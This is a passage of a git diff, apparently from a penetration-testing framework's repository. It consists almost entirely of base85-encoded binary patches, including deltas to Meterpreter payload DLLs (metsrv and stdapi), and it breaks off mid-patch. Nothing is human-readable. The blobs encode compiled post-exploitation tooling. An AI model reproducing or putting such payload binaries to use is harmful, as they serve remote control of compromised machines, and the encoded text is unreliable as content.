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 NCVaND&PgbZ`8%}j91j2h diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll index afc03f53a6f1723109aa98b7b01692fc10f0dff9..d298f5525ec761cbb55e6ba4694cceee8368b931 100755 GIT binary patch delta 56 zcmZpeAlWcMa)SgT^O}DhlcgDbng2VoH)k`pXETB@6A&|R&t_!dyaQ6uUVfKld-+|~ G&MW{c?-Ymt delta 56 zcmZpeAlWcMa)SgTv#DmnWNAiU<^$8%nzI?(vl&5{35c1uXEU;J-T^6SFTcyOz5Fg~ GXBGh4IT5u0 diff --git a/data/meterpreter/ext_server_stdapi.x86.dll b/data/meterpreter/ext_server_stdapi.x86.dll index 130e10e17511bf37894821a22b2245a9e376447b..747a9697261347bb3dd1183692e6dae516cab456 100755 GIT binary patch delta 66 zcmZo@5pQS_-=M(A9QUtdvNEGDN7G6+1||ju#_0=wvq&^gU~Hej2*ON2%)EU9Ba28U QNNM}>E|%@fyI3R50m9K0=l}o! delta 66 zcmZo@5pQS_-=M(AT&IyRS((w7qu?(q0}}%S<Mai;StOb#Ft$%%1Yss1X5K!5kwv7F SxmF{geR&tl_T^oyk>&uE7!+&( diff --git a/data/meterpreter/metsrv.x64.dll b/data/meterpreter/metsrv.x64.dll index b2185a8370bae6b30c5077b7febbde6263a1f514..d1db92c52b46a4213738d4e63b0b47a9b6837bf2 100755 GIT binary patch delta 148889 zcmbrncUV=&6F1JD#zjR?xzePHQbYt%L9u`Wf}*0>yT;xN*cBB}@rv!LWA8O;5`%ig z5=HF2*O*vRE-|*m82kNw_8c&ne4pR@Jn!otoV&BLv$L}^v$L~%j#Iyhn)*%D{O97j zkFys1*+NK6F*jy4U8j_?vAGmg#%7#NiGTCU+IX9DSU5Xk&SyQ?3A2yTih1Xb6r2Rs z-#kMKVUf9eBuB>l%_rm&tfx6g=^@zcGe1?r+1XrQ+q)urmiw{PAc19?2ik98-<!*o zZNyfZTjOun+y!M@GQs|9^8<&c%)@-iu{-;2LydBb9WsZOug>O~yO;N4gUlJ_cW_9B z35Mm{4K@im_EF|<D=cH{%t=oEY`i(u=?zQI9cHu_*+}ywmwK#@S#=2#N^dqlatUWQ 